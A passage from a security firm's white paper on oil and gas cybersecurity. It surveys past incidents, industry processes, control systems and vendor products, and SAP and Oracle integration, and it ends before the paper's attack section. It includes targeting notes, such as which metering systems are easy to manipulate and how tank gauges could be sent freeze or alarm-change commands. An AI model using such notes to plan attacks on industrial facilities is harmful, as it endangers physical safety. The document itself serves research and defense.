White

Paper
OIL AND GAS CYBER SECURITY
FROM SAP TO ICS

Alexander Polyakov
Matheu Geli

www.erpscan.com
Contents
Disclaimer................................................................................................................. 4
1. Intro....................................................................................................................... 5
2. Oil and Gas Cybersecurity ................................................................................... 7
2.1. Oil and Gas Cybersecurity history..................................................................... 8
Oil and Gas 101....................................................................................................... 10
Upstream processes.............................................................................. 11
Midstream. . ............................................................................................ 12
Downstream . . ........................................................................................ 13
Main Processes .. .................................................................................... 14
Extraction (Drilling).. ......................................................................... 14
Gathering.......................................................................................... 14
Separation........................................................................................ 15
Enterprise Application in Oil and Gas..................................................... 25
SAP in oil and Gas............................................................................. 25
Oracle in Oil and Gas......................................................................... 28
Attacking Oil and Gas............................................................................................. 30
Oracle EAM.. ........................................................................................... 33
SAP HANA.............................................................................................. 33
SAP Manufacturing Integration and Intelligence.................................... 33
Getting admin rights on the Netweaver platform.............................. 34
Getting OS rights on the MII server................................................... 34
Disclosing data from industrial process ................................................ 39
Modifying data....................................................................................... 39
Faking data............................................................................................ 40
Conclusion.............................................................................................................. 42
References.............................................................................................................. 44
2
Additional reading ................................................................................................. 46
About ERPScan....................................................................................................... 47
About ERPScan
Research Team....................................................................................................... 48
Our Contacts........................................................................................................... 49
Products................................................................................................ 49
Services................................................................................................. 49

3
Disclaimer
The partnership agreement and relationship between ERPScan and SAP prevents us from publishing
the detailed information about vulnerabilities before SAP releases a patch. This review will only include
the details of those vulnerabilities that we have the right to publish as of the release date. However,
additional examples of exploitation that prove the existence of the vulnerabilities are available in
conference demos as well as at ERPScan.com.

Our SAP security surveys and research in other areas of SAP security do not end with this whitepaper.
You can find the latest updates about the statistics of SAP services found on the Internet and other
endeavors of the EAS-SEC project.

This document or any part of it cannot be reproduced in whole or in part without prior written
permission of ERPScan. SAP SE is neither the author nor the publisher of this whitepaper and is
not responsible for its content. ERPScan is not responsible for any damage that can be incurred by
attempting to test the vulnerabilities described here. This publication contains references to SAP SE
products. SAP NetWeaver and other SAP products and services mentioned herein are trademarks or
registered trademarks of SAP SE in Germany.

4
1. Intro
The idea is simple. We want to show that mission-critical business applications are often connected
between each other by different types of integration technologies. What’s more important, enterprise
applications that are located in the corporate network usually have connections with devices in OT
network and there is no easy way to separate them.

If you have some plant devices, which collect data about oil volume, for example, you should somehow
transfer the data to the corporate network to demonstrate it on nice dashboards. That is why even if
you have a firewall between IT and OT there are some applications, which are connected. That is why it
is possible to conduct an attack and pivot from IT network (or even the Internet) into OT network up to
field devices and smart meters.

What else?
• It is the first Oil and Gas Cybersecurity research ever so far.
• There are still more questions than answers in this area. Research that is more detailed requires
unique equipment. However, there are many software and hardware devices, which are relatively
easy to find.

It is just a beginning. Our goal was not to prepare a comprehensive encyclopedia on Oil and Gas
cybersecurity but to lay the basis for further research (that hopefully will be conducted by the
community) and to show that all issues in technology networks we have already discovered (and you
will) can be exploited from the corp network. We welcome everybody to continue this research.

Who should read this white paper and why?

• Researchers – Oil and Gas Cybersecurity is a small universe, which is almost unexplored. If you have
ever thought about doing something in this area, here is your chance to spend 2 hours instead
2 months, as after reading this paper, you will definitely know what to do to carry out your own
research.
• Pentersters - you will learn how to break into the most critical network and how to impress decision
makers during your pentests. Instead of “Hey, we have access to your domain controller” you will
be able to say something like “Hey, I can change the gas pressure in your storage. Isn’t it critical
enough?”

5
• CISOs – There is a bad news, unfortunately. Now you will learn that there is no Air Gap between
your enterprise network and, for example, oil refinery, sorry. The truth is that hackers can pivot into
your production systems from the corp network or even from the Internet. This paper will help you
to understand how to prevent it.

SAP and Oracle admins – You guys are partly responsible for the security of very important OT
processes. SAP and Oracle systems have connections with most of those systems by one or another
way. This whitepaper will highlight what exactly can be wrong.

Why Oil and Gas?

We have chosen the Oil and Gas sector because of two reasons:

• 1) We have experience and understanding of processes as we saw them on the real environment
and can prove that these attack vectors could be performed (we presented them during our
customer engagement).
• 2) Oil, Gas, and other natural resources are not easy to be measured. It is possible to spoof the data
in a way that nobody will be able to investigate.

Let’s compare it with the retail industry. You know how many Nike boots are stored in your warehouse,
and even if somebody obtains access to it, steals shoes and then changes their quantity in ERP system,
in some time somebody will find that something is wrong. When dealing with natural resources,
nobody knows the real quantity. It is calculated on a number of metrics such as pressure, temperature,
etc… According to descriptions of some popular technologies that optimize Hydrocarbon Supply
Chain, hydrocarbon volumes fluctuate depending on environmental temperature and pressure
conditions. As product valuation needs quantity and mass, and simple weighing is not possible, one
should derive them from volumes at ambient temperature and pressure conditions, requiring complex
conversion calculations of the observed volumes at each custody transfer point. Imagine what can
happen if an attacker accesses and modifies this data.

6
2. Oil and Gas Cybersecurity
Industrial automation and control systems such as SCADA (supervisory control and data acquisition),
DCS (Distributed Control System), PLC (Programmable Logical Controllers), OPC servers, Field Devices,
and other critical components are often referred to as Operational Technology (OT).

OT is used to monitor and control physical processes in the oil and gas industry. The role of OT is
the acquisition of data coming from processes (temperatures, pressures, valve positions, tank levels,
human operators) and the direct control of electric, mechanical, hydraulic or pneumatic actuators.

In the good old days, most OT networks were air-gapped from the business network (office
network) and the Internet and operated independently using proprietary hardware, software and
communications protocols. However, in recent years, demand for business insight, requirements
for remote network access and the spreading of hardware and traditional IT software (e.g., TCP/ IP
networking, Windows-based platforms) caused many oil and gas companies to integrate control
systems and their enterprise IT systems, and some of them can even provide an access to OT network
from the cloud.

Cybercrimes cost energy and utility companies an average of $13.2 million each a year for lost business
and damaged equipment, higher than in any other industry, Ponemon’s survey of 257 businesses
reported. [1]

7
2.1. Oil and Gas Cybersecurity
history
December, 2002 - Venezuela’s state oil company was involved in a strike. There were also instances of
computer hacking which caused a significant damage since many operations are centrally controlled
by PCs. Someone, possibly an employee involved in the general strike, remotely accessed a program
terminal to erase all PLC programs in port facility. This and other physical sabotage cut Venezuela’s
national production down to 370,000 barrels per day, compared with 3 million barrels before the strike.

2008 - Hackers interfered with alarms and communications for Baku-Tbilisi-Ceyhan pipeline in Turkey,
super-pressurizing crude oil to cause an explosion that resulted in the spilling of more than 30,000
barrels of oil.

23 October, 2009 - An explosion happened in Bayamon, Puerto Rico. The fire blazed for three days,
burning down houses, causing black clouds of gasoline-fueled smoke and forcing residents to flee their
homes. Investigators said it was a glitch in the facility’s computerized monitoring system. A storage
tank was refilled with gasoline from a fuel ship docked along the San Juan harbor. Since the tank’s
meter malfunctioned, the petrol kept overflowing until it met an ignition source. [2]

2010 - STUXNET was used to hijack industrial control systems around the globe, including computers
used to manage oil refineries, gas pipelines, and power plants. Although Stuxnet was not designed to
affect the Oil and Gas industry, it seriously affected these companies as well.

2012 – As a result of cyber attack on Aramco, Saudi Arabian national petroleum and natural gas
company, 30000 computers were damaged. The attack aimed to stop gas and oil production in Saudi
Arabia and prevent resource flow to international markets.

10 September, 2012 – Telvent, a supplier of remote administration and monitoring tools to the
energy sector, became a victim of sophisticated advanced persistent threat. On September, 10 the
Canadian branch discovered that its internal firewall and security systems had been breached and
warned its customers against the incident.

According to Telvent, every energy company in the Fortune 100 relies on their systems. Telvent
solutions manage more than 60 percent of the total hydrocarbon movements in North American and
Latin American pipelines.

8
The attacker appeared to be a Chinese hacking group. The malware names and network components
used in the attack have been used in the past by a Chinese cyber-group called the “Comment Group,”
according to Dell SecureWorks. Comment Group targeted a variety of organizations, including chemical
and electric companies as well as other industrial sectors.

After breaching the network and installing malware, the attackers stole project files related to the
OASyS SCADA product, a remote administration tool. OASyS allows companies to combine older IT
equipment with modern “smart grid” technologies.

The attackers may have wanted the code in order to find vulnerabilities in the software to launch future
attacks against other energy companies directly. [3]

August, 2014 - Hackers Launch All-Out Assault on Norwegian Oil and Gas Industry

Hackers have targeted about 300 different firms within the country’s oil and energy industries. The
attacks were revealed in August 2014 by the Nasjonal Sikkerhetsmyndighet (National Security Authority
Norway), which had been tipped off to the attacks by «international contacts”. The NSM named 50
companies that were identified to have been attacked and another 250 that may have been targeted
and who received warning letters from the agency.

During this attack, emails that seemed to be legitimate were sent to persons in important roles at
the companies with attachments. When the targeted employee opens the attachment, a destructive
program was uploaded and checked the system for various holes in its security.

The goal of this attack was to plant a Trojan or a virus on the machine. The first program just sets up
contact and allows the attacker to sit outside and download damaging code. [4]

January, 2015 - A device used to monitor the gasoline levels at refueling stations across the United
States – known as an automated tank gauge or ATG – could be remotely accessed by online attackers,
manipulated to cause alerts, and even set to shut down the flow of fuel, according to the research.
Several Guardian AST gas-tank-monitoring systems have suffered electronic attacks possibly instigated
by hacktivist groups. Successful attacks can affect inventory control, data gathering, and delivery
tracking, in turn affecting the availability of gasoline in local stations. [5]

Today’s Cyber Security threats went far beyond simple virus spread, computer or data damage or
theft and transformed to the nature of ones that have the capabilities of changing the process plant
operations, for example:

• Increasing/decreasing pressure in a pipeline;


• Changing field device parameter settings;

• Closing/Opening a motorized valve;

• Causing a Denial of Service (DoS) attack within ICS;

• Increasing/Decreasing Motor Speed;
• Displaying fake Process Diagrams & Alarms to the operators’ Human Machine Interfaces (HMI),
SCADA/MES, ERP systems, and other applications.

9
Oil and Gas 101
Oil and Gas processes are usually divided into 3 separate areas: Upstream, Midstream, and
Downstream.

Upstream - The upstream sector includes the searching for potential underground or
underwater crude oil and natural gas fields, drilling of exploratory wells, and subsequently drilling and
operating the wells that recover and bring the crude oil and/or raw natural gas to the surface. The
upstream oil sector is also commonly known as the exploration and production (E&P) sector.

Midstream- The midstream sector involves the transportation (by pipeline, rail, barge, oil tanker or
truck), storage, and wholesale marketing of crude or refined petroleum products. Pipelines and other
transport systems can be used to move crude oil from production sites to refineries and deliver the
various refined products to downstream distributors.

Downstream -The downstream sector commonly refers to the refining of petroleum crude oil and
the processing and purifying of raw natural gas, as well as the marketing and distribution of products
derived from crude oil and natural gas. The downstream sector touches consumers through products
such as gasoline or petrol, kerosene, jet fuel, diesel oil, heating oil, fuel oils, lubricants, waxes, asphalt,
natural gas, and liquefied petroleum gas (LPG) as well as hundreds of petrochemicals. [6]

10
Upstream processes
The upstream segment of the business is also known as the exploration and production (E&P) sector
which includes activities related to searching for, recovering and producing crude oil and natural gas.

11
Upstream consists of the following main business processes that, in their turn, consist of listed sub-
processes:

• Extraction (Drilling)
–– Pump control system, blow-out prevention, flaring, and venting
• Gathering (From earth to separators)
–– Wellhead management system, manifolds management, net oil measurements
• Separation (Separate oil, gas, and water)
–– Multiple separators (2phase/3phase), Heaters, Vibration Monitoring System, Compressor
Control System, Burner Management Systems, Coalescence, Desalting Management
System, Emergency Shutdown System
• Gas compression (Prepare for storage and transport)
–– Multiple stages
• Temporary Oil Storage (Temporarily store before loading)
–– Tank Inventory System, Tank Gauging System, Movement management system
• Waste disposal
–– Water disposal
• Metering (Calculate quantity before loading)
–– Fiscal Metering, Liquid Flow Metering, Gas Flow Metering Systems, Wet Gas Metering
Systems, Provers & Master Meters

Midstream
The midstream sector involves the transportation (by pipeline, rail, barge, oil tanker or truck), storage,
and wholesale marketing.

12
Midstream consists of the following main business processes that, in their turn, consist of listed sub-
processes

• Terminal management (Obtain Oil from Upstream)

–– Measurement Systems, Movement Automation Systems, Order Movement Management
• Gas Processing (Separate natural gas and NGL)
• Gas Transportation (transfer gas to storage)
–– Pipeline management system
• Oil transportation (transfer Oil to storage)
–– Pipeline management system
• Gas storage (temporary and long-term)
–– Peak load Gas Storage, Gas storage, LNG Storage
• Oil Storage (Long-term oil storage)
–– Tank inventory system, Tank Temperature management, Tank Gauging System, Product
Movement System

Downstream
The downstream sector commonly refers to the refining of petroleum crude oil and the processing and
purifying of raw natural gas, as well as the marketing and distribution of products derived from crude
oil and natural gas.

Downstream consists of the following main business processes that, in their turn, consist of listed sub-
processes:

• Refining (Processing of Crude Oil)

–– Blend Optimization, Emission Monitoring System
• Oil Petrochemicals (Fabrication of base chemicals and plastics)
–– Too many processes to be listed here
• Gas Distribution (deliver gas to utilities)
• Oil Wholesale (deliver petrol to 3rd parties)
–– Loading, Terminal automation
• Oil Retail (deliver petrol to end users)

Truck loading Automation, Gas-Pump-Monitoring-Systems, POS

13
Main Processes
Extraction (Drilling)
Risks: Plant Sabotage/Shutdown, Compliance violation, Equipment damage, Production Disrup-
tion, Safety violation

Drilling is physically creating the “borehole” in the ground that will eventually become an oil or gas well.
Rig contractors and service companies in the oilfield services business sector do this work.

Drilling process includes, at least, the following systems:

• Pump control systems

• Blow-out prevention systems
• Flare and Vent disposal systems
Extraction as a business process was not covered in this research.

Gathering
Risk: Plant Sabotage/Shutdown, Compliance violation, Equipment damage, Production Disrup-
tion, Safety violation

Gathering includes all processes responsible for lifting crude oil from the ground and transferring it to
separators.

Well monitoring systems

Wellheads are situated on the surface of oil or gas wells leading down to the reservoir. Wellhead can
also be an injection well used to inject water.

Well monitoring systems (WMS) are used to estimate the flow rates of oil, gas, and water from all the
individual wells in an oil field. The real-time evaluation is based on data from available sensors in the
wells and flow lines.

Manifolds management
The individual well streams are brought into the main production facilities over a network of gathering
pipelines and manifold systems.

Net Oil Measurement

Sometimes, Oil measurement starts here just to estimate values.

Invensys Foxboro is one of the solutions that can be used for this purpose. [7]

14
Separation
Risks: Product Quality, Equipment damage

Oil generally comes out of a well mixed with water and, often, small amounts of natural gas. Similarly,
natural gas often comes out of the ground mixed with water vapor and other gasses. These various
components must be separated before «pipeline quality» oil and/or natural gas can be sent to market.

To remove water and natural gas from oil, the mixture is passed through a device called first stage
separator or High Pressure separator that removes the gas and sends it into a separate line. The
remaining oil, gas and water mixture goes into a heater/treater unit. Heating helps to break up the
mixture so that oil separates from water, which is denser. Any remaining natural gas, as it is less
thick than oil, rises to the top. The gas is removed for either processing or burning; water is removed
and stored for further usage.

The second stage is quite similar to the first-stage HP separator. The pressure here is around 10
atmospheres and temperature is below 100 degrees celsius. An oil heater could be located between
the first and the second stage separator to reheat the oil/water/gas mixture.

The third separator here is a two-phase separator also called a flash drum. The pressure there is
reduced to atmospheric.

…A large pressure reduction in a single separator will cause a flash vapourisation leading to
instability and safety hazards. The retention period is typically 5 hours.
…An important thing is also preventing gas blow-by that happens when a low oil level causes
gas to exit via the Oil output, causing high pressure downstream.

Burner Management System (BMS)

In the oil and natural gas industry, various facilities (e.g. tanks, line heaters, separators, dehydrators,
amine reboilers, etc.) are used in the production and transportation of oil and natural gas. They require
heat to facilitate the proper function of the application. To provide that heat, a burner is used within
the application.

Burner Management Systems makes oil & gas companies safier, more efficient, and more compliant.

15
Safety controls on direct-fired heaters have continuously evolved over the recent past, and the
evolution has accelerated over the last five years. This has been due to the introduction of government
legislation that actively enforces the application of existing codes. Heater designs and quality
standards have followed the practice of API 560. For most operating companies this is now mandatory
and used as a minimum standard with individual companies adding their own requirements.

Many operating companies within North America are implementing BMS in new and existing heaters
in accordance with required guidelines; however, there are some installations that still rely only on
manual operator intervention or the plant Emergency Shutdown (ESD) as the safety control.

Without a BMS, companies will face the following problems:

• Workers must discover and reignite the extinguished burner. The worker then reignites the
application manually (often with a fuel-soaked rag that’s tied to a stick). This process takes time
and can be very dangerous.
• No electronic temperature control. The application burns continuously, often needlessly, until the
flame fails.
• No safety shutdown; with BMS certain application inputs (e.g. high/low pressure, level, etc.) indicate
a potential problem.

Most of the major ICS vendors provide BMS solutions.

Examples of BMS systems:

• Invensys BMS [8]
• Emerson DeltaV SIS BMS [9]
• Siemens BMS [10]
• Honeywell BMS [11]

Separators consist of many other sub-processes controlled by the following systems:

• Distributed Control System. For example, CENTUM CS3000 by Yokogawa.

• Emergency Shutdown System (ESD). For example, Emerson DeltaV SIS™ Emergency Shutdown
• Compressor Control System (CCS). For example, Three Triconex TS3000 TMR
• Vibration Monitoring System (VMS). For example, Bently Nevada 3500

Waste disposal
Risk: Plant Sabotage/Shutdown, Utilities Interruption, Compliance violation

Water disposal

On an installation where the water cut is high, there will be a huge amount of water produced.
This water should be cleaned before discharge to sea.

Water disposal and related processes were not covered in this research.

16
Metering
Risks: Product Quality, Monetary loss

Metering is the most important process. It plays an essential role, as the quality of final products
depends on how proper the metering was. During the metering, systems analyze density, viscosity
water content, temperature, and pressure. The metering usually consists of several runs. Each run
employs one meter and several instruments for temperature and pressure correction. Gas metering is
less accurate than Oil metering (+-1%). The most important kind of metering is fiscal one.

Custody Transfer (Fiscal Metering)

Custody Transfer in the oil and gas industry refers to the transactions involving transporting physical
substance from one operator to another. This includes the transferring of raw and refined petroleum
between tanks and tankers, tankers and ships and other transactions. Custody transfer in fluid
measurement is defined as a metering point (location) where the fluid is being measured for sale from
one party to another. During custody transfer, accuracy is of great importance to both the company
delivering the material and the eventual recipient.

The term «fiscal metering» is often interchanged with custody transfer, and refers to metering that is a
point of a commercial transaction such as when a change in ownership takes place. [12]

Payment is usually made as a function of the amount of fluid or gas transferred, so accuracy is
paramount as even a small error in measurement can add up fast, leading to financial exposure in
custody transfer transactions. For example, Pump Station 2 on the Alaska Pipeline is designed to pump
60,000 gallons per minute (227 cubic meters per minute) of oil. A small error of 0.1% equates to an error
of 2,057 barrels of oil a day. At a spot price of $105 a barrel, that 0.1% error would cost $216,000 a day.
Over a year, the 0.1% error would amount to a difference of $78.8 million. The error could be either on
the high side, benefiting the seller; or on the low side, to the buyer’s benefit.

The engine of a custody transfer or fiscal metering installation is the flow computer. It is the device
that takes the inputs from the measuring devices (flowmeters, pressure sensors, temperature sensors,
density sensors, gas chromatographs, and others) and calculates the amount of liquid or gas that
has been transferred. These calculations are based on a variety of industry standard flow calculation
algorithms. [13]

Metering control software

Data aggregation and management systems provide the complete information enabling one to gain
and maintain control over all aspects of the measurement processes. It gives a basis for important
decisions at all levels, from QMI engineering to top management.

Its idea of predictive maintenance not only reduces unnecessary work, expense and downtime; it
primarily eradicates give-away inherent to previous systems.

17
Examples of Fiscal Metering systems:

Data Aggregation and management (easy to manipulate values)

• FlawCall – FlawCall Enterprise (! Internet access)

• KROHNE SynEnergy (! Internet access + SAP Access)
• Honeywell’s Experion® Process Knowledge System (PKS), MeterSuite™
• OPC Servers (Keepware, MatrikonOPC) (SAP Access)
• Schneider Electric InFusion
• Schneider Electric SCADAPack

Flow computing: (hard to manipulate)

• KROHNE Summit 8800

• ABB TolatFlow
• Emerson FloBoss S600 (previously known as Daniel DanPac S600)
• Emerson ROC800
• Schneider Electric Realflo

Flow Meters

• KROHNE, Vortex, etc.

The most common flow computer is Emerson Foboss S600 (Previously known as Daniel DanPac
secure metering computer Daniel S600+) [14]

The FloBoss S600+ Flow Computer is a panel-mounted (for indoor use) flow computer designed
specifically to measure hydrocarbon liquid and gas where versatility and accuracy matter. The
standard features suits for fiscal measurement, custody transfer, batch loading, and meter proving
applications. The S600+ allows you to configure multi-stream, multi-station applications, enabling
you to simultaneously meter liquids and gasses. The S600+ can be used either as a stand-alone flow
computer or as a component of the system. The intelligent I/O modules fit both gas and liquid. Adding
I/O modules (up to a maximum of three) allows configuring up to six dual-pulsed streams or up to
10 single-pulsed streams and two headers. The S600+ supports orifice, ultrasonic, turbine, positive
displacement, Coriolis, Annubar, and V-Cone® flow. [15]

18
Terminal Management
Risks: Plant Sabotage/Shutdown, Equipment damage, Production Disruption (Stop or pause
production), Product Quality (bad oil and Gas quality), Compliance violation (Pollution), Safety
violation (Death or injury)

The next stage is to transfer oil from Upstream to Midstream by special terminals. Usually, terminal
management consists of the following systems; sometimes functionality of those systems can be
combined in one solution.

• Movement Automation Systems (MAS)

• Order Movement Management (OMM)

Gas Processing
Risks: Plant Sabotage/Shutdown, Equipment damage, Production Disruption (Stop or pause
production), Product Quality (bad oil and gas quality), Compliance violation (Pollution), Safety
violation (Death or injury)

Major transportation pipelines usually impose restrictions on the make-up of the natural gas that
is allowed into the pipeline. Before the natural gas can be transported, it must be purified. Ethane,
propane, butane, and pentanes must be removed from natural gas, but it does not mean that they are
all ‘waste products’.

In fact, associated hydrocarbons, known as ‘natural gas liquids’ (NGLs) can be very valuable by-
products of natural gas processing. NGLs consist of ethane, propane, butane, iso-butane, and natural
gasoline. The complete processing of natural gas takes place at a processing plant, usually located in
a natural gas producing region. The extracted natural gas is transported to these processing plants
through a network of gathering pipelines that are small-diameter, low-pressure pipes. A complex
gathering system may consist of thousands of miles of pipes, interconnecting the processing plant to
upwards of 100 wells in the area.

Gas Processing processes were not covered in this research.

Gas Transportation
Risks: Plant Sabotage/Shutdown, Equipment damage, Production Disruption (Stop or pause
production), Product Quality (bad oil and Gas quality), Undetected Spills, Compliance violation
(Pollution), Safety violation (Death or injury)

A significant part of the data received by a control station is provided by supervisory control and data
acquisition (SCADA) systems. These systems are essentially sophisticated communications systems
that take measurements, collect data along the pipeline (usually in metering or compressor stations
and valves), and transmit the data to the centralized control station. Flow rate through the pipeline,
operational status, pressure, and temperature readings can be used to assess the status of the pipeline
at any one time. These systems also work in real time, so there is a little lag time between taking
measurements along the pipeline and transmitting them to the control station. Equipment status
scans are taken every 6-90 seconds depending on the communication technology used in the field
(NPC 2001).

19
This information allows pipeline engineers to know exactly what is happening along the pipeline at all
times, which permits quick reactions to equipment malfunctions, leaks, or any other unusual activity
along the pipeline, as well as to monitoring load control. Some SCADA systems also incorporate the
ability to operate certain equipment along the pipeline remotely, including compressor stations,
which allows engineers in a centralized control center to adjust flow rates in the pipeline immediately
and easily.

SCADA systems can also operate on cell phone technology, such as the Cellular Digital Packet Data
network, which does not require lines or other infrastructure such as an antenna tower. Some SCADA
systems operate directly through the Internet, eliminating certain maintenance concerns for the
operator and adding new risks.

Gas Transportation processes were not covered in this research.

Oil Transportation
Risks: Plant Sabotage/Shutdown, Equipment damage, Production Disruption (Stop or pause
production), Product Quality (bad oil and Gas quality), Undetected Spills, Illegal taping, Compli-
ance violation (Pollution), Safety violation (Death or injury)

Oil transportation is the process of tracking crude oil and products via pipelines. Oil transportation
solutions accurately track incoming and outgoing movements via pipelines down to the terminals,
enabling more accurate crude unit scheduling.

Oil transportation processes were not covered in this research.

Base load Gas Storage

Risks: Plant Sabotage/Shutdown, Equipment damage, Compliance violation (Pollution), Safety
violation (Death or injury)

There are two ways how to control natural gas in storage facilities: meeting base load requirements
and meeting peak load requirements.

Natural gas storage is required for two reasons: meeting seasonal demand requirements and as
insurance against unexpected supply disruptions. Base load storage capacity is used to meet seasonal
demand increases. Base load facilities are capable of holding enough natural gas to satisfy long-term
seasonal demand requirements. Typically, the turn-over rate for natural gas in these facilities is a year;
natural gas is generally injected during the summer (non-heating season), and withdrawn during the
winter (heating season), usually from November to March. These reservoirs are larger, but their delivery
rates are relatively low, meaning the natural gas that can be extracted each day is limited. Instead,
these facilities provide a prolonged, steady supply of natural gas. Depleted gas reservoirs are the most
common type of base load storage facility.

Base load Gas storage processes were not covered in this research.

20
Peak load Gas Storage
Risks: Plant Sabotage/Shutdown, Equipment damage, Compliance violation (Pollution), Safety
violation (Death or injury)

Peak load storage are designed to have high deliverability for short periods, meaning natural gas can
be withdrawn from storage quickly when the need arises. Peak load facilities are intended to meet
sudden, short-term demand increases. These facilities cannot hold as much natural gas as base load
facilities; however, they can deliver smaller amounts of gas more quickly, and can also be replenished
in a shorter amount of time than base load facilities. While base load facilities have long-term injection
and withdrawal seasons, turning over the natural gas in the facility about once per year, peak load
facilities can have turnover rates as short as a few days or weeks. Salt caverns are the most common
type of peak load storage, although aquifers may be used to meet these demands as well.

Peak load Gas storage processes were not covered in this research.

LNG Storage
Risks: Plant Sabotage/Shutdown, Equipment damage, Compliance violation (Pollution), Safety
violation (Death or injury)

The LNG storage facility liquefies natural gas by cooling it to -160 degrees centigrade and stores it in
liquid form. The main feature is its location and ability to rapidly revaporise the natural gas, and deliver
it to the National Transmission System (NTS).

As a result, LNG storage is able to provide a peak gas supply to shippers and supplement NGGs
network capacity. In addition, LNG Storage is used as a contingency against the risk of emergencies
such as system constraints, failures in supply or failures in end user interruption.

LNG Gas storage processes were not covered in this research.

Oil Storage
Risks: Plant Sabotage/Shutdown, Equipment damage, Production Disruption, Compliance viola-
tion, Safety violation

Oil is stored in storage tanks. Storage location usually consists of 10-100+ tanks with 1-50m barrels. To
manage these tanks, companies use Tank Inventory systems. Tank Inventory System collects data from
special tank gauging systems such as level, pressure or float radars that are used to measure the level
in storage tanks, they also store records of volumes and history.

Monitoring the levels in offsite storage tanks of flammable materials can significantly reduce the
likelihood of initiating events that could have a potential impact not only on the operation but also on
safety and the environment. Tank level deviations can result in accidents such as a tank overfilling,
liquefied gas flashing through a pressure safety valve header, a floating roof mechanical damage, or an
extraction pump running dry. The high severity of consequences for safety and the environment are
exacerbated by the large inventories of hazardous materials involved. As more operations are pressed
to make improvements in their tank farm and terminal operations management systems, the following
offers an overview of best practices for complying with the HSE Recommendations while reducing
costs and driving more value from the operation.

21
Here is the list of the most common solutions for Oil and Gas:

• Systems connected with IT

–– Enfaf TM BOX
–– Honeywell’s Experion® Process Knowledge System (PKS) (For Terminals)
• Tank Inventory Systems (single-window interface for Tank Gauging Systems)
–– Emerson Rosemount TankMaster WinOpi
–– Schneider-electric SimSci™
–– Honeywell Enraf Entis Pro
–– MHT VTW
• Tank Gauging Systems
–– Emerson TankMaster Server
–– Honeywell Enraf BPM
–– Saab, Varec, GSI, MTS, L&J…
• Meter Management
–– ControlLogic PLC
–– SmartView
• Meters/Gauges
–– SmartRadar FlexLine
–– ABB
–– Honeywell VIT
–– Enraf 854 ATG Servo Advanced Tank Level Gauge

22
Management consoles of Tank Inventor systems do not just read the data. Some of them (for example,
Emerson Rosemount TankMaster WinOpi) can also control Tank Gauging software and hardware.
If an attacker gets an unauthorized access to control commands, he can change any Alarm (Level,
Temperature, and Pressure) for tanks configured as servo tanks or send Freeze and Lock commands to
a servo gauge.

Refinery
Risks: Plant Sabotage/Shutdown, Equipment damage, Product Quality, Production Disruption,
Compliance violation, Safety violation

The job of the refinery is to sort and improve the hydrocarbons within the crude. Gasoline, propane,
jet fuel, heating oil, and petrochemicals are just some of the specially formulated products leaving the
refinery. Technicians in a central control room can fine-tune refinery operations to produce the desired
mix of products.

An oil refinery, or petroleum refinery, is an industrial process plant where crude oil is processed and
refined into petroleum naphtha, gasoline, diesel fuel, asphalt base, heating oil, kerosene and liquefied
petroleum gas.

Oil refineries are typically large, sprawling industrial complexes with extensive piping running
throughout, carrying streams of fluids between large chemical processing units.

In many ways, oil refineries use a lot of the technology of, and can be thought as types of chemical
plants. [16]

23
Refinery solutions are the following:

• Solutions for high-level overview and decision-making

–– Emerson DeltaV, OSISoft PI (Advanced Metering Infrastructure)
• Management solutions
–– Siemens Simatic SCADA (Lots of vulnerabilities )
–– Experion PKS SCADA
–– Modcon SCADA
–– Ignition SCADA
–– Schneider-electric SimSci™
• Devices
–– Siemens
–– MODCON MOD-800
–– + hundreds of specific devices for each refinery state

24
Enterprise Application in Oil and Gas
SAP (ABAP, J2EE Mobile, HANA, BusinessObjects) and Oracle (EBS, PeopleSoft, JDE, Siebel)
applications are very common in large companies. In the Oil and Gas sector, SAP has more than
246000 customers worldwide including 86% of Forbes 500 and 85% of Fortune 2000 Oil and Gas.
Oracle applications are used by 100% of Fortune 100 companies.

SAP in oil and Gas

Today, upstream operations bring together many technical disciplines and business functions that are
loosely connected. The challenge is to support a closed-loop view, leveraging a common platform
for operations and maintenance, to enable you to gather, analyze, decide, and execute across the
many elements that drive performance of assets at different lifecycle stages.

25
SAP in Oil and Gas: Capital and Spend Effectiveness
Advantages:

• Improving supplier relations

• Reducing the cost of processing supplier invoices
• Enhance visibility and transparency

Risks:

• Availability – direct impact on cost effectiveness

• Fraud – price/quantity manipulation
Applications:

• SAP PPM

SAP In Oil and Gas: Hydrocarbon Supply Chain

Advantages:

• Hydrocarbon production management

• Hydrocarbon revenue management
• Field logistics
Risks:

• Supply chain Availability – direct impact on cost effectiveness

• Fraud in SAP – Manipulations with quantities*
• Sabotage - Physical damage
Applications:

• SAP’s ECC IS-OIL

Hydrocarbon volumes, which are the basis for pricing, excise duty, and transportation fees,
fluctuate depending on environmental temperature and pressure conditions; as we require
masses and weights for product valuation, and weighing is not possible, we must derive
them from volumes at ambient temperature and pressure conditions, requiring complex
conversion calculations of the observed volumes at each custody transfer point. Different units
of measurement are in use globally, further complicating the issue, as even modern terminal
automation systems do not support all units of measure – Forrester Research

26
SAP in Oil and Gas: Integrated Digital Oilfield Operations
Advantages:

• Integrate production, maintenance, and engineering operations

• Streamline data collection, validation, surveillance, and notification
• Close the gap between decision-making and on field execution

Risks:

• Sabotage - Physical damage to production and engineering devices

• Operations Availability – direct impact on cost effectiveness
• Data manipulation in SAP – improper management decisions, lost profits

Applications:

• SAP ECC IS-OIL

• SAP PRA (production and revenue accounting)
• SAP RLM (remote logistic management)

SAP In Oil and Gas: Operational Integrity

Advantages:

• Monitor key risk indicators and access control policy

• Maintain the structural and mechanical integrity of physical assets
• Manage emissions, hazardous substances, and product and regulatory compliances

Risks:

• Access control, data manipulation

• Sabotage - Physical damage to production and engineering devices
• Compliance Violation – Data manipulation to give an illusion of meeting compliance requirements

Applications:

• SAP EAS/PM (Asset Management)

• SAP UOM (Upstream Operation Management)

27
Oracle in Oil and Gas
Oracle as well as SAP has solutions to fulfil requirements of the Oil and Gas industry.

Product Lifecycle and Production Optimization

Oracle Primavera, Oracle PPM

Asset Management

• Oracle EAM (Based on Oracle E-business Suite)

• Oracle Field Service based on Oracle E-business Suite (formerly Service Online) drives profitability
by automating the process of dispatching field technicians to service calls in remote locations.
Field Service improves customer satisfaction by more accurately predicting a window to promise
for service delivery and it contains the Ц Manager designed to eliminate guesswork surrounding
qualification, availability, and geographic relevance of each field service technician. [17]

LIMS

Most of the laboratory Information Management Systems that we saw use Oracle Database to store
data.

IT applications VS OT processes
Let’s look at how business applications are connected with critical OT business processes.

• Enterprise project portfolio management <- Exploration

–– SAP PPM, Oracle PPM Primavera, MS Project, MS SharePoint
• Asset Lifecycle Management <- Refinery, Separation
